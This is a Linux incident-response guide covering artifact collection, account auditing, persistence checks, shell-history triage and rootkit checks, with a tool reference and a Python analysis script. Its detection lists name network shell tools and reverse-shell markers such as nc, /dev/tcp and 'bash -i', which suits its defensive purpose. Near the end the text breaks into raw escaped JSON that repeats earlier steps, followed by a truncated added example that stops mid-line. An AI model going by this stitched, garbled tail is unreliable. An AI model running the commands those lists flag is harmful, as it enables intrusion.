# Analyzing Linux System Artifacts

## When to Use

- When investigating a compromised Linux server or workstation
- For identifying persistence mechanisms (cron, systemd, SSH keys)
- When tracing user activity through shell history and authentication logs
- During incident response to determine the scope of a Linux-based breach
- For detecting rootkits, backdoors, and unauthorized modifications

## Prerequisites

- Forensic image or live access to the Linux system (read-only)
- Understanding of Linux file system hierarchy (FHS)
- Knowledge of common Linux logging locations (/var/log/)
- Tools: chkrootkit, rkhunter, AIDE, auditd logs
- Familiarity with systemd, cron, and PAM configurations
- Root access for complete artifact collection

## Workflow

### Step 1: Mount and Collect System Artifacts

```bash
# Mount forensic image read-only (offset = start sector * sector size)
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/linux_evidence.dd /mnt/evidence

# Create collection directories ("analysis" is written to by later steps)
mkdir -p /cases/case-2024-001/linux/{logs,config,users,persistence,network,analysis}

# Collect authentication logs
cp /mnt/evidence/var/log/auth.log* /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/secure* /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/syslog* /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/kern.log* /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/audit/audit.log* /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/wtmp /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/btmp /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/lastlog /cases/case-2024-001/linux/logs/
cp /mnt/evidence/var/log/faillog /cases/case-2024-001/linux/logs/

# Collect user artifacts
for user_dir in /mnt/evidence/home/*/; do
    username=$(basename "$user_dir")
    mkdir -p "/cases/case-2024-001/linux/users/$username"
    cp "$user_dir"/.bash_history "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp "$user_dir"/.zsh_history "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp -r "$user_dir"/.ssh/ "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp "$user_dir"/.bashrc "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp "$user_dir"/.profile "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp "$user_dir"/.viminfo "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp "$user_dir"/.wget-hsts "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
    cp "$user_dir"/.python_history "/cases/case-2024-001/linux/users/$username/" 2>/dev/null
done

# Collect root user artifacts (root's home is outside /home, so create its directory)
mkdir -p /cases/case-2024-001/linux/users/root
cp /mnt/evidence/root/.bash_history /cases/case-2024-001/linux/users/root/ 2>/dev/null
cp -r /mnt/evidence/root/.ssh/ /cases/case-2024-001/linux/users/root/ 2>/dev/null

# Collect system configuration
cp /mnt/evidence/etc/passwd /cases/case-2024-001/linux/config/
cp /mnt/evidence/etc/shadow /cases/case-2024-001/linux/config/
cp /mnt/evidence/etc/group /cases/case-2024-001/linux/config/
cp /mnt/evidence/etc/sudoers /cases/case-2024-001/linux/config/
cp -r /mnt/evidence/etc/sudoers.d/ /cases/case-2024-001/linux/config/
cp /mnt/evidence/etc/hosts /cases/case-2024-001/linux/config/
cp /mnt/evidence/etc/resolv.conf /cases/case-2024-001/linux/config/
cp -r /mnt/evidence/etc/ssh/ /cases/case-2024-001/linux/config/
```

### Step 2: Analyze User Accounts and Authentication

```bash
# Analyze user accounts for anomalies (quoted heredoc delimiter: no shell expansion of $6$ etc.)
python3 << 'PYEOF'
print("=== USER ACCOUNT ANALYSIS ===\n")

# Parse /etc/passwd
with open('/cases/case-2024-001/linux/config/passwd') as f:
    for line in f:
        parts = line.strip().split(':')
        if len(parts) >= 7:
            username, _, uid, gid, comment, home, shell = parts[0], parts[1], int(parts[2]), int(parts[3]), parts[4], parts[5], parts[6]

            # Flag accounts with UID 0 (root equivalent)
            if uid == 0 and username != 'root':
                print(f"  ALERT: UID 0 account: {username} (shell: {shell})")

            # List regular users that have a login shell
            if shell not in ('/bin/false', '/usr/sbin/nologin', '/bin/sync') and uid >= 1000:
                print(f"  User: {username} (UID:{uid}, Shell:{shell}, Home:{home})")

            # Flag system accounts with login shells
            if uid < 1000 and uid > 0 and shell in ('/bin/bash', '/bin/sh', '/bin/zsh'):
                print(f"  WARNING: System account with shell: {username} (UID:{uid}, Shell:{shell})")

# Parse /etc/shadow for account status
print("\n=== PASSWORD STATUS ===")
with open('/cases/case-2024-001/linux/config/shadow') as f:
    for line in f:
        parts = line.strip().split(':')
        if len(parts) >= 3:
            username = parts[0]
            pwd_hash = parts[1]
            last_change = parts[2]   # days since 1970-01-01

            if pwd_hash and pwd_hash not in ('*', '!', '!!', ''):
                hash_type = 'Unknown'
                if pwd_hash.startswith('$6$'):
                    hash_type = 'SHA-512'
                elif pwd_hash.startswith('$5$'):
                    hash_type = 'SHA-256'
                elif pwd_hash.startswith('$y$'):
                    hash_type = 'yescrypt'
                elif pwd_hash.startswith('$1$'):
                    hash_type = 'MD5 (WEAK)'
                print(f"  {username}: {hash_type} hash, last changed: day {last_change}")
PYEOF

# Analyze login history
last -f /cases/case-2024-001/linux/logs/wtmp > /cases/case-2024-001/linux/analysis/login_history.txt
lastb -f /cases/case-2024-001/linux/logs/btmp > /cases/case-2024-001/linux/analysis/failed_logins.txt 2>/dev/null
```

### Step 3: Examine Persistence Mechanisms

```bash
# Check cron jobs for all users
echo "=== CRON JOBS ===" > /cases/case-2024-001/linux/persistence/cron_analysis.txt

# System cron
for cronfile in /mnt/evidence/etc/crontab /mnt/evidence/etc/cron.d/*; do
    echo "--- $cronfile ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
    cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
    echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
done

# User crontabs
for cronfile in /mnt/evidence/var/spool/cron/crontabs/*; do
    echo "--- User crontab: $(basename "$cronfile") ---" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
    cat "$cronfile" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
    echo "" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt
done

# Check systemd services for persistence (unit files newer than the OS install are listed first)
echo "=== SYSTEMD SERVICES ===" > /cases/case-2024-001/linux/persistence/systemd_analysis.txt
find /mnt/evidence/etc/systemd/system/ -name "*.service" -newer /mnt/evidence/etc/os-release \
    >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt

for svc in /mnt/evidence/etc/systemd/system/*.service; do
    echo "--- $(basename "$svc") ---" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
    cat "$svc" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
    echo "" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt
done

# Check authorized SSH keys (backdoor detection); the path is passed as $1, never
# substituted into the shell command string
echo "=== SSH AUTHORIZED KEYS ===" > /cases/case-2024-001/linux/persistence/ssh_keys.txt
find /mnt/evidence/home/ /mnt/evidence/root/ -name "authorized_keys" \
    -exec sh -c 'echo "--- $1 ---"; cat "$1"; echo ""' sh {} \; \
    >> /cases/case-2024-001/linux/persistence/ssh_keys.txt

# Check rc.local and init scripts
cat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt

# Check /etc/profile.d/ for login-triggered scripts
ls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt

# Check for LD_PRELOAD hijacking
grep -r "LD_PRELOAD" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt
cat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt
```

### Step 4: Analyze Shell History and Command Execution

```bash
# Analyze bash history for each user
python3 << 'PYEOF'
import os, glob

print("=== SHELL HISTORY ANALYSIS ===\n")

suspicious_commands = [
    'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c',
    'perl -e', 'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp',
    'nmap', 'masscan', 'hydra', 'john', 'hashcat', 'passwd', 'useradd',
    'iptables -F', 'ufw disable', 'history -c', 'rm -rf /', 'dd if=',
    'crontab', 'at ', 'systemctl enable', 'ssh-keygen', 'scp ', 'rsync',
    'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt', 'shred',
    'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/'
]

for hist_file in glob.glob('/cases/case-2024-001/linux/users/*/.bash_history'):
    username = hist_file.split('/')[-2]
    print(f"User: {username}")

    with open(hist_file, 'r', errors='ignore') as f:
        lines = f.readlines()

    print(f"  Total commands: {len(lines)}")
    flagged = []
    for i, line in enumerate(lines):
        line = line.strip()
        for cmd in suspicious_commands:
            if cmd in line.lower():
                flagged.append((i + 1, line))
                break   # one match per line is enough

    if flagged:
        print(f"  Suspicious commands: {len(flagged)}")
        for lineno, cmd in flagged:
            print(f"    Line {lineno}: {cmd[:120]}")
    print()
PYEOF
```

### Step 5: Check for Rootkits and Modified Binaries

```bash
# Check for known rootkit indicators
# Hash system binaries so they can be compared against known-good values
find /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/ \
    -type f -executable -exec sha256sum {} + > /cases/case-2024-001/linux/analysis/binary_hashes.txt

# Check for SUID/SGID binaries (potential privilege escalation)
find /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt
find /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt

# Check for suspicious files in /tmp and /dev/shm
find /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f 2>/dev/null \
    -exec file {} \; > /cases/case-2024-001/linux/analysis/tmp_files.txt

# Check for hidden files (first 100 hits)
find /mnt/evidence/ -type f -name ".*" 2>/dev/null | \
    head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt

# Check out-of-tree kernel modules for the first installed kernel version
kver=$(ls /mnt/evidence/lib/modules/ | head -n 1)
ls -la "/mnt/evidence/lib/modules/$kver/extra/" 2>/dev/null \
    > /cases/case-2024-001/linux/analysis/extra_modules.txt

# Check for modified PAM configuration (authentication backdoors);
# baseline first, so "+" lines in the diff are what the evidence added
diff -ru /cases/baseline/pam.d/ /mnt/evidence/etc/pam.d/ 2>/dev/null \
    > /cases/case-2024-001/linux/analysis/pam_changes.txt
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| /var/log/auth.log | Primary authentication log on Debian/Ubuntu systems |
| /var/log/secure | Primary authentication log on RHEL/CentOS systems |
| wtmp/btmp | Binary logs recording successful and failed login sessions |
| .bash_history | User command history file (can be cleared by attackers) |
| crontab | Scheduled task system commonly used for persistence |
| authorized_keys | SSH public keys granting passwordless access to an account |
| SUID bit | File permission allowing execution as the file owner (privilege escalation vector) |
| LD_PRELOAD | Environment variable that loads a shared library before all others (hooking technique) |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| chkrootkit | Rootkit detection scanner for Linux systems |
| rkhunter | Rootkit Hunter - checks for rootkits, backdoors, and local exploits |
| AIDE | Advanced Intrusion Detection Environment - file integrity monitor |
| auditd | Linux audit framework for system call and file access monitoring |
| last/lastb | Parse wtmp/btmp for login and failed login history |
| Plaso/log2timeline | Super-timeline creation including Linux artifacts |
| osquery | SQL-based system querying for live forensic investigation |
| Velociraptor | Endpoint agent with Linux artifact collection capabilities |

## Common Scenarios

**Scenario 1: SSH Brute Force Followed by Compromise**
Analyze auth.log for failed SSH attempts followed by a success, identify the attacking IP, check .bash_history for post-compromise commands, examine authorized_keys for added backdoor keys, check crontab for persistence, review network connections.

**Scenario 2: Web Server Compromise via Application Vulnerability**
Examine web server access and error logs for exploitation attempts, check /tmp and /dev/shm for webshells, analyze the web server user's activity (www-data), check for privilege escalation via SUID binaries or kernel exploits, review outbound connections.

**Scenario 3: Insider Threat on Database Server**
Analyze the suspect user's bash_history for database dump commands, check for large tar/zip files in the home directory or /tmp, examine scp/rsync commands for data transfer, review cron jobs for automated exfiltration, check USB device logs.

**Scenario 4: Crypto-Miner on Cloud Instance**
Check for high-CPU processes in /proc (live) or systemd service files, examine crontab entries for miner restart scripts, check /tmp for mining binaries, analyze network connections for mining pool communications, review authorized_keys for attacker access.

## Output Format

```
Linux Forensics Summary:
  System: webserver01 (Ubuntu 22.04 LTS)
  Hostname: webserver01.corp.local
  Kernel: 5.15.0-91-generic

  User Accounts:
    Total: 25 (3 with UID 0 - 1 ANOMALOUS)
    Interactive shells: 8 users
    Recently created: admin2 (created 2024-01-15)

  Authentication Events:
    Successful SSH logins: 456
    Failed SSH attempts: 12,345 (from 23 unique IPs)
    Sudo executions: 89

  Persistence Mechanisms Found:
    Cron jobs: 3 suspicious (reverse shell, miner restart)
    Systemd services: 1 unknown (update-checker.service)
    SSH keys: 2 unauthorized keys in root authorized_keys
    rc.local: Modified with download cradle

  Suspicious Activity:
    - bash_history contains wget to pastebin URL
    - SUID binary /tmp/.hidden/escalate found
    - /dev/shm/ contains compiled ELF binary
    - LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so

  Report: /cases/case-2024-001/linux/analysis/
```

---

## Attachment: references/api-reference.md

API Reference: Linux Forensic Artifact Analysis Tools (as originally attached: text/markdown, 3491 bytes, SHA-256 `965f675c920085a7a68dcc41a7effc5eb5dc59b957194405d2b1d028d288c668`).

### Key Artifact Locations

| Artifact | Path | Description |
|----------|------|-------------|
| Auth logs | `/var/log/auth.log` (Debian), `/var/log/secure` (RHEL) | Authentication events |
| Login history | `/var/log/wtmp` | Successful logins (binary, use `last`) |
| Failed logins | `/var/log/btmp` | Failed logins (binary, use `lastb`) |
| Bash history | `~/.bash_history` | Command history per user |
| SSH keys | `~/.ssh/authorized_keys` | Authorized public keys |
| Crontab | `/etc/crontab`, `/var/spool/cron/crontabs/` | Scheduled tasks |
| Systemd services | `/etc/systemd/system/` | Service definitions |
| LD_PRELOAD | `/etc/ld.so.preload` | Shared library preloading |
| SUID binaries | `find / -perm -4000` | Setuid executables |

### last / lastb - Login History

#### Syntax
```bash
last -f /var/log/wtmp                # Successful logins
lastb -f /var/log/btmp               # Failed logins
last -i -f /var/log/wtmp             # Show IP addresses
last -s 2024-01-15 -t 2024-01-20     # Date range filter
```

#### Output Format
```
user     pts/0    192.168.1.50    Mon Jan 15 09:00   still logged in
```

### chkrootkit - Rootkit Scanner

#### Syntax
```bash
chkrootkit                     # Full scan
chkrootkit -r /mnt/evidence    # Scan mounted evidence
chkrootkit -q                  # Quiet (infected only)
```

### rkhunter - Rootkit Hunter

#### Syntax
```bash
rkhunter --check                       # Full system check
rkhunter --check --rootdir /mnt/ev     # Check evidence root
rkhunter --list tests                  # List available tests
rkhunter --propupd                     # Update file properties DB
```

#### Check Categories
| Check | Description |
|-------|-------------|
| `rootkits` | Known rootkit signatures |
| `trojans` | Trojanized system binaries |
| `properties` | File permission anomalies |
| `filesystem` | Hidden files and directories |

### auditd Log Parsing

#### ausearch Syntax
```bash
ausearch -m execve -ts recent      # Recent command execution
ausearch -m USER_AUTH -ts today    # Authentication events
ausearch -k suspicious_activity    # Custom audit rule key
ausearch -ua 0 -ts today           # Root user actions
```

#### aureport Syntax
```bash
aureport --auth        # Authentication summary
aureport --login       # Login summary
aureport --file        # File access summary
aureport --summary     # Overall summary
```

### osquery - SQL-based System Queries

#### Syntax
```bash
osqueryi "SELECT * FROM users WHERE uid = 0"
osqueryi "SELECT * FROM crontab"
osqueryi "SELECT * FROM authorized_keys"
osqueryi "SELECT * FROM suid_bin"
osqueryi "SELECT * FROM process_open_sockets"
```

#### Key Tables
| Table | Content |
|-------|---------|
| `users` | User account information |
| `crontab` | Cron job entries |
| `authorized_keys` | SSH authorized keys |
| `suid_bin` | SUID binaries |
| `process_open_sockets` | Network connections by process |
| `shell_history` | Command history entries |

### Plaso / log2timeline - Super Timeline

#### Syntax
```bash
log2timeline.py /cases/timeline.plaso /mnt/evidence
psort.py -o l2tcsv /cases/timeline.plaso > timeline.csv
psort.py -o l2tcsv /cases/timeline.plaso "date > '2024-01-15'"
```

### AIDE - File Integrity

#### Syntax
```bash
aide --init       # Initialize database
aide --check      # Check for changes
aide --compare    # Compare databases
```

## Attachment: scripts/agent.py

As originally attached: text/x-python, 9952 bytes, SHA-256 `1075135007001b405b49bd5549cd0a3069f44fbc82715b8d312129cb677213dd`.

```python
#!/usr/bin/env python3
"""Linux system artifact forensics agent for investigating compromised systems."""

import os
import sys
import glob
import shlex
import subprocess


def run_cmd(cmd):
    """Execute a command and return (stdout, stderr, returncode)."""
    if isinstance(cmd, str):
        cmd = shlex.split(cmd)
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
    return result.stdout.strip(), result.stderr.strip(), result.returncode


def analyze_passwd(passwd_path):
    """Analyze /etc/passwd for suspicious accounts."""
    findings = []
    with open(passwd_path, "r") as f:
        for line in f:
            parts = line.strip().split(":")
            if len(parts) < 7:
                continue
            username, _, uid, gid = parts[0], parts[1], int(parts[2]), int(parts[3])
            home, shell = parts[5], parts[6]
            if uid == 0 and username != "root":
                findings.append({
                    "severity": "CRITICAL",
                    "finding": f"UID 0 account: {username} (shell: {shell})",
                })
            login_shells = ["/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/zsh"]
            if uid < 1000 and uid > 0 and shell in login_shells:
                findings.append({
                    "severity": "WARNING",
                    "finding": f"System account with login shell: {username} (UID:{uid})",
                })
            if uid >= 1000 and shell not in ["/bin/false", "/usr/sbin/nologin", "/bin/sync"]:
                findings.append({
                    "severity": "INFO",
                    "finding": f"Interactive user: {username} (UID:{uid}, Home:{home})",
                })
    return findings


def analyze_shadow(shadow_path):
    """Analyze /etc/shadow for password hash types and status."""
    findings = []
    with open(shadow_path, "r") as f:
        for line in f:
            parts = line.strip().split(":")
            if len(parts) < 3:
                continue
            username = parts[0]
            pwd_hash = parts[1]
            if pwd_hash and pwd_hash not in ("*", "!", "!!", ""):
                hash_type = "Unknown"
                if pwd_hash.startswith("$6$"):
                    hash_type = "SHA-512"
                elif pwd_hash.startswith("$5$"):
                    hash_type = "SHA-256"
                elif pwd_hash.startswith("$y$"):
                    hash_type = "yescrypt"
                elif pwd_hash.startswith("$1$"):
                    hash_type = "MD5 (WEAK)"
                    findings.append({
                        "severity": "WARNING",
                        "finding": f"{username} uses weak MD5 password hash",
                    })
                findings.append({
                    "severity": "INFO",
                    "finding": f"{username}: {hash_type} hash, last changed day {parts[2]}",
                })
    return findings


def analyze_bash_history(history_path, username="unknown"):
    """Analyze bash history for suspicious commands."""
    suspicious_patterns = [
        "wget", "curl", "nc ", "ncat", "netcat", "python -c", "python3 -c",
        "perl -e", "base64", "chmod 777", "chmod +s", "/dev/tcp", "/dev/udp",
        "nmap", "masscan", "hydra", "john", "hashcat", "passwd", "useradd",
        "iptables -F", "ufw disable", "history -c", "rm -rf", "dd if=",
        "crontab", "systemctl enable", "ssh-keygen", "scp ", "rsync",
        "/tmp/", "/dev/shm/", "mkfifo", "socat",
    ]
    findings = []
    with open(history_path, "r", errors="ignore") as f:
        lines = f.readlines()
    for i, line in enumerate(lines):
        line_stripped = line.strip()
        for pattern in suspicious_patterns:
            if pattern in line_stripped.lower():
                findings.append({
                    "user": username,
                    "line_number": i + 1,
                    "command": line_stripped[:200],
                    "matched_pattern": pattern,
                })
                break
    return findings


def check_cron_persistence(evidence_root):
    """Check cron jobs for persistence mechanisms."""
    findings = []
    cron_paths = [
        os.path.join(evidence_root, "etc/crontab"),
        *glob.glob(os.path.join(evidence_root, "etc/cron.d/*")),
        *glob.glob(os.path.join(evidence_root, "var/spool/cron/crontabs/*")),
    ]
    for cron_path in cron_paths:
        if os.path.exists(cron_path) and os.path.isfile(cron_path):
            with open(cron_path, "r", errors="ignore") as f:
                for line in f:
                    line = line.strip()
                    if line and not line.startswith("#"):
                        suspicious = any(
                            p in line.lower()
                            for p in ["wget", "curl", "/tmp/", "/dev/shm/", "base64",
                                      "python", "bash -i", "reverse", "nc ", "ncat"]
                        )
                        if suspicious:
                            findings.append({
                                "severity": "HIGH",
                                "source": cron_path,
                                "entry": line[:200],
                            })
    return findings


def check_ssh_keys(evidence_root):
    """Check for unauthorized SSH authorized_keys."""
    findings = []
    key_files = glob.glob(
        os.path.join(evidence_root, "home/*/.ssh/authorized_keys")
    ) + glob.glob(
        os.path.join(evidence_root, "root/.ssh/authorized_keys")
    )
    for key_file in key_files:
        if os.path.exists(key_file):
            with open(key_file, "r") as f:
                keys = [l.strip() for l in f if l.strip() and not l.startswith("#")]
            if keys:
                findings.append({
                    "file": key_file,
                    "key_count": len(keys),
                    "keys": [k[:80] + "..." for k in keys],
                })
    return findings


def check_systemd_persistence(evidence_root):
    """Check for suspicious systemd service files."""
    findings = []
    service_dirs = [
        os.path.join(evidence_root, "etc/systemd/system"),
        os.path.join(evidence_root, "usr/lib/systemd/system"),
    ]
    for svc_dir in service_dirs:
        if not os.path.exists(svc_dir):
            continue
        for svc_file in glob.glob(os.path.join(svc_dir, "*.service")):
            with open(svc_file, "r", errors="ignore") as f:
                content = f.read()
            suspicious = any(
                p in content.lower()
                for p in ["/tmp/", "/dev/shm/", "wget", "curl", "reverse",
                          "bash -i", "nc ", "python", "base64"]
            )
            if suspicious:
                findings.append({
                    "severity": "HIGH",
                    "file": svc_file,
                    "preview": content[:300],
                })
    return findings


def check_ld_preload(evidence_root):
    """Check for LD_PRELOAD rootkit indicators."""
    findings = []
    preload_path = os.path.join(evidence_root, "etc/ld.so.preload")
    if os.path.exists(preload_path):
        with open(preload_path, "r") as f:
            content = f.read().strip()
        if content:
            findings.append({
                "severity": "CRITICAL",
                "finding": f"/etc/ld.so.preload contains: {content}",
            })
    return findings


def find_suid_binaries(evidence_root):
    """Find SUID binaries (potential privilege escalation)."""
    # find exits non-zero on any unreadable path but still prints what it found,
    # so keep the output regardless of the return code
    stdout, _, _ = run_cmd(["find", evidence_root, "-perm", "-4000", "-type", "f"])
    return stdout.splitlines() if stdout else []


def find_suspicious_tmp_files(evidence_root):
    """Find files in /tmp and /dev/shm."""
    findings = []
    for tmp_dir in ["tmp", "dev/shm"]:
        full_path = os.path.join(evidence_root, tmp_dir)
        if os.path.exists(full_path):
            for root, dirs, files in os.walk(full_path):
                for fname in files:
                    fpath = os.path.join(root, fname)
                    findings.append(fpath)
    return findings


if __name__ == "__main__":
    print("=" * 60)
    print("Linux System Artifacts Forensics Agent")
    print("User accounts, persistence, shell history, rootkit detection")
    print("=" * 60)

    evidence_root = sys.argv[1] if len(sys.argv) > 1 else "/mnt/evidence"

    if os.path.exists(evidence_root):
        print(f"\n[*] Examining evidence root: {evidence_root}")

        passwd_path = os.path.join(evidence_root, "etc/passwd")
        if os.path.exists(passwd_path):
            print("\n--- User Account Analysis ---")
            for f in analyze_passwd(passwd_path):
                print(f"  [{f['severity']}] {f['finding']}")

        shadow_path = os.path.join(evidence_root, "etc/shadow")
        if os.path.exists(shadow_path):
            print("\n--- Password Hash Analysis ---")
            for f in analyze_shadow(shadow_path):
                print(f"  [{f['severity']}] {f['finding']}")

        print("\n--- Shell History ---")
        history_files = glob.glob(os.path.join(evidence_root, "home/*/.bash_history")) + \
            glob.glob(os.path.join(evidence_root, "root/.bash_history"))
        for hist in history_files:
            user = os.path.basename(os.path.dirname(hist))
            for h in analyze_bash_history(hist, user):
                print(f"  {h['user']} line {h['line_number']}: {h['command'][:80]}")

        print("\n--- Cron Persistence ---")
        cron = check_cron_persistence(evidence_root)
        for c in cron:
            print(f"  [{c['severity']}] {c['source']}: {c['entry'][:80]}")

        print("\n--- SSH Authorized Keys ---")
        ssh = check_ssh_keys(evidence_root)
        for s in ssh:
            print(f"  {s['file']}: {s['key_count']} keys")

        print("\n--- Systemd Persistence ---")
        systemd = check_systemd_persistence(evidence_root)
        for s in systemd:
            print(f"  [{s['severity']}] {s['file']}")

        print("\n--- LD_PRELOAD Rootkit Check ---")
        ld = check_ld_preload(evidence_root)
        for l in ld:
            print(f"  [{l['severity']}] {l['finding']}")

        print("\n--- SUID Binaries ---")
        for s in find_suid_binaries(evidence_root)[:20]:
            print(f"  {s}")

        print("\n--- Suspicious Temp Files ---")
        tmp = find_suspicious_tmp_files(evidence_root)
        for t in tmp[:20]:
            print(f"  {t}")
    else:
        print("\n[DEMO] Usage: python agent.py <evidence_mount_point>")
        print("[*] Mount a forensic image and provide the path for analysis.")
```
/cases/case-2024-001/linux/persistence/systemd_analysis.txt\ndone\n\n# Check authorized SSH keys (backdoor detection)\necho \"=== SSH AUTHORIZED KEYS ===\" > /cases/case-2024-001/linux/persistence/ssh_keys.txt\nfind /mnt/evidence/home/ /mnt/evidence/root/ -name \"authorized_keys\" -exec sh -c \\\n 'echo \"--- {} ---\"; cat {}; echo \"\"' \\; >> /cases/case-2024-001/linux/persistence/ssh_keys.txt\n\n# Check rc.local and init scripts\ncat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt\n\n# Check /etc/profile.d/ for login-triggered scripts\nls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt\n\n# Check for LD_PRELOAD hijacking\ngrep -r \"LD_PRELOAD\" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt\ncat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 4: Analyze Shell History and Command Execution","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Analyze bash history for each user\npython3 \u003c\u003c 'PYEOF'\nimport os, glob\n\nprint(\"=== SHELL HISTORY ANALYSIS ===\\n\")\n\nsuspicious_commands = [\n 'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c',\n 'perl -e', 'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp',\n 'nmap', 'masscan', 'hydra', 'john', 'hashcat', 'passwd', 'useradd',\n 'iptables -F', 'ufw disable', 'history -c', 'rm -rf /', 'dd if=',\n 'crontab', 'at ', 'systemctl enable', 'ssh-keygen', 'scp ', 'rsync',\n 'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt', 'shred',\n 'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/'\n]\n\nfor hist_file in glob.glob('/cases/case-2024-001/linux/users/*/.bash_history'):\n username = hist_file.split('/')[-2]\n print(f\"User: {username}\")\n\n with open(hist_file, 'r', errors='ignore') as 
f:\n lines = f.readlines()\n\n print(f\" Total commands: {len(lines)}\")\n flagged = []\n for i, line in enumerate(lines):\n line = line.strip()\n for cmd in suspicious_commands:\n if cmd in line.lower():\n flagged.append((i+1, line))\n break\n\n if flagged:\n print(f\" Suspicious commands: {len(flagged)}\")\n for lineno, cmd in flagged:\n print(f\" Line {lineno}: {cmd[:120]}\")\n print()\nPYEOF","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 5: Check for Rootkits and Modified Binaries","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Check for known rootkit indicators\n# Compare system binary hashes against known-good\nfind /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/ \\\n -type f -executable -exec sha256sum {} \\; > /cases/case-2024-001/linux/analysis/binary_hashes.txt\n\n# Check for SUID/SGID binaries (potential privilege escalation)\nfind /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt\nfind /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt\n\n# Check for suspicious files in /tmp and /dev/shm\nfind /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f 2>/dev/null \\\n -exec file {} \\; > /cases/case-2024-001/linux/analysis/tmp_files.txt\n\n# Check for hidden files and directories\nfind /mnt/evidence/ -name \".*\" -not -path \"*/\\.\" -type f 2>/dev/null | \\\n head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt\n\n# Check kernel modules\nls -la /mnt/evidence/lib/modules/$(ls /mnt/evidence/lib/modules/ | head -1)/extra/ 2>/dev/null \\\n > /cases/case-2024-001/linux/analysis/extra_modules.txt\n\n# Check for modified PAM configuration (authentication backdoors)\ndiff /mnt/evidence/etc/pam.d/ /cases/baseline/pam.d/ 2>/dev/null \\\n > 
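The account review in Step 2 is a small set of checks on `/etc/passwd` and `/etc/shadow`. The following is an added example, not code from the original skill: it puts those checks into functions that can be unit-tested, adds two checks the step does not make (duplicate UIDs, and home directories under temp or hidden paths), recognises locked hashes (`!` prefix, as left by `passwd -l`) and bcrypt, and converts the shadow "days since epoch" field into a calendar date. Every account, path and hash below is a constructed placeholder.

```python
"""Audit copies of /etc/passwd and /etc/shadow for account anomalies.

Added example (not from the original skill). Accounts, paths and hashes
below are constructed placeholders, not data from a real system.
"""
from datetime import date, timedelta

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/usr/sbin/nologin
sysadm:x:0:0:backup:/tmp/.x:/bin/sh
"""

# The hash bodies are placeholders; only the $id$ prefix matters for this audit.
SAMPLE_SHADOW = """\
root:$6$saltsalt$placeholderhash:19700:0:99999:7:::
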